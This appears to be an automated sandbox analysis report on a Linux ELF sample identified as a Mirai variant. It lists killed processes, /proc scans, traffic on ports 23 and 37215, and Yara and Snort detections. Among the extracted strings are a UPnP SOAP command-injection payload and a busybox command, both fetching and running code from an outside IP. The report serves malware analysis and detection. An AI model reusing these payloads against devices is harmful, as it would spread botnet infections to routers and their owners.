Source: /tmp/F00D0B21M4.elf (PID: 6205)	SIGKILL sent: pid: 6208, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 720, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 759, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 788, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 800, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 847, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 884, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 1334, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 1335, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 1860, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 1872, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6205, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6211, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6212, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6213, result: successful	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	SIGKILL sent: pid: 6220, result: successful	Jump to behavior

Source: ELF static info symbol of initial sample

.symtab present: no

Source: Initial sample	String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample	String containing 'busybox' found: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Source: classification engine

Classification label: mal100.spre.troj.linELF@0/0@0/0

Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1582/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2033/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2275/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/3088/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1612/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1579/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1699/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1335/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1698/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2028/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1334/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1576/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2302/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/3236/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2025/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2146/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/910/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/4444/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/4445/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/912/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/4446/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/517/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/759/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2307/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/918/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1594/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2285/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2281/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1349/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1623/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/761/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1622/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/884/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1983/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2038/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1344/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1465/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1586/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1860/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1463/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2156/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/800/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/801/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1629/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1627/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1900/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/3021/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/491/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2294/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2050/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1877/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/772/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1633/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1599/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1632/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/774/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1477/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/654/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/896/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1476/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1872/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2048/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/655/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1475/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2289/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/656/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/777/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/657/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/658/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/4468/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/419/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/936/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1639/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1638/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2208/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2180/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/6141/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1809/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1494/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1890/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2063/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2062/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1888/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1886/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/420/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1489/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/785/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1642/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/788/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/667/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/789/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/4477/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1648/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2078/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2077/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2074/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2195/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/670/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2746/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/793/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1656/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1654/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/674/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/2226/exe	Jump to behavior
Source: /tmp/F00D0B21M4.elf (PID: 6214)	File opened: /proc/1532/exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54034
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54048
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54050
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54064
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54070
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54072
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54076
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54080
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54106
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 54122
Source: unknown	Network traffic detected: HTTP traffic on port 46134 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 46134
Source: unknown	Network traffic detected: HTTP traffic on port 51374 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51374 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 51374
Source: unknown	Network traffic detected: HTTP traffic on port 49582 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 49582
Source: unknown	Network traffic detected: HTTP traffic on port 41458 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 41458
Source: unknown	Network traffic detected: HTTP traffic on port 35542 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 35542
Source: unknown	Network traffic detected: HTTP traffic on port 46578 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 34908 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 34908
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 46578
Source: unknown	Network traffic detected: HTTP traffic on port 49476 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 49476
Source: unknown	Network traffic detected: HTTP traffic on port 35538 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 35538
Source: unknown	Network traffic detected: HTTP traffic on port 33446 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 33446
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33584
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33584
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33590
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33602
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33624
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33640
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33648
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33666
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33698
Source: unknown	Network traffic detected: HTTP traffic on port 41388 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33704
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 41388
Source: unknown	Network traffic detected: HTTP traffic on port 23 -> 33714

Source: /tmp/F00D0B21M4.elf (PID: 6203)

Queries kernel information via 'uname':

Jump to behavior

Source: F00D0B21M4.elf, 6205.1.0000556452916000.000055645299b000.rw-.sdmp	Binary or memory string: RdUu-binfmt/m68k/usr/bin/qemu-m68kq
Source: F00D0B21M4.elf, 6205.1.0000556452916000.000055645299b000.rw-.sdmp	Binary or memory string: RdU1!/usr/bin/vmtoolsd
Source: F00D0B21M4.elf, 6205.1.0000556452916000.000055645299b000.rw-.sdmp	Binary or memory string: RdU2!/usr/bin/qemu-m68k
Source: F00D0B21M4.elf, 6205.1.0000556452916000.000055645299b000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: F00D0B21M4.elf, 6203.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6205.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6205.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6206.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6208.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6211.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6212.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6213.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6219.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6220.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-m68k
Source: F00D0B21M4.elf, 6205.1.0000556452916000.000055645299b000.rw-.sdmp	Binary or memory string: u-binfmt/m68k/usr/bin/qemu-m68k
Source: F00D0B21M4.elf, 6203.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6205.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6206.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6208.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6211.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6212.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6213.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6219.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6220.1.0000556452916000.000055645299b000.rw-.sdmp	Binary or memory string: RdU!/etc/qemu-binfmt/m68k
Source: F00D0B21M4.elf, 6203.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6205.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6206.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6208.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6211.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6212.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6213.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6219.1.0000556452916000.000055645299b000.rw-.sdmp, F00D0B21M4.elf, 6220.1.0000556452916000.000055645299b000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/m68k
Source: F00D0B21M4.elf, 6203.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6205.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6206.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6208.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6211.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6212.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6213.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6219.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp, F00D0B21M4.elf, 6220.1.00007ffc410e6000.00007ffc41107000.rw-.sdmp	Binary or memory string: <~x86_64/usr/bin/qemu-m68k/tmp/F00D0B21M4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/F00D0B21M4.elf

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: F00D0B21M4.elf, type: SAMPLE
Source: Yara match	File source: 6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: F00D0B21M4.elf, type: SAMPLE
Source: Yara match	File source: 6212.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6213.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6203.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6206.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6211.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6208.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6219.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6205.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6220.1.00007f3e38001000.00007f3e38014000.r-x.sdmp, type: MEMORY

Detected Mirai

Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
Source: Traffic	Snort IDS: ETPRO TROJAN Mirai Variant User-Agent (Outbound)
